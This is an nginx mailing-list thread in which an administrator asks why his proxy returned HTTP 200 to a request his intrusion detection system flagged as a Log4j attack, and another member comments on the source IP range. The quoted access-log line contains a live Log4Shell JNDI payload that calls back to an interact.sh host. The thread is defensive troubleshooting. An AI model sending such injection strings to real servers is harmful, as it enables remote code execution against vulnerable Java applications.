Thank you very much for your reply. I really appreciated it.
I’ll wait for the final gurus feedback too.

Mauro

> On 29 Dec 2021, at 18:03, lists <lists@lazygranch.com> wrote:
>
> That IP space is certified shady. I detect the occasional hack from them. See
>
> https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/
>
> and
>
> https://wirelessdataspco.org/faq.php
>
> These wireless companies will do anything for money including leasing their IP space.
>
> I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers customers. But I am appalled highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them.
>
> I will leave it up to the gurus to parse the log.
>
>
>
>
>
>
> Original Message
>
>
> From: mauro.tridici@cmcc.it
> Sent: December 29, 2021 6:55 AM
> To: nginx@nginx.org
> Reply-to: nginx@nginx.org
> Subject: Help request about Log4j attack attempts and NGINX logs meaning
>
>
>
>
> Dear Users,
>
>
> I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform.
> Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks.
> In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs.
>
>
> At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts.
> Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was “HTTP/1.1 200” and I’m very worried about it.
> Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j.
>
>
> Could you please help me to understand the reason why the NGINX server answer was “HTTP/1.1 200”!?
>
>
> You can see below the mail notification I received:
>
>
>
> Attack Notification.
> 2021 Dec 28 20:45:59
>
> Received From: “hidden_NGINX_server_IP” >/var/log/nginx/access.log
> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
> Src IP: 166.137.252.110
> Portion of the log(s):
>
> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://“hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" “-"
>
>
> Thank you in advance,
> Mauro
> _______________________________________________
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx


_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx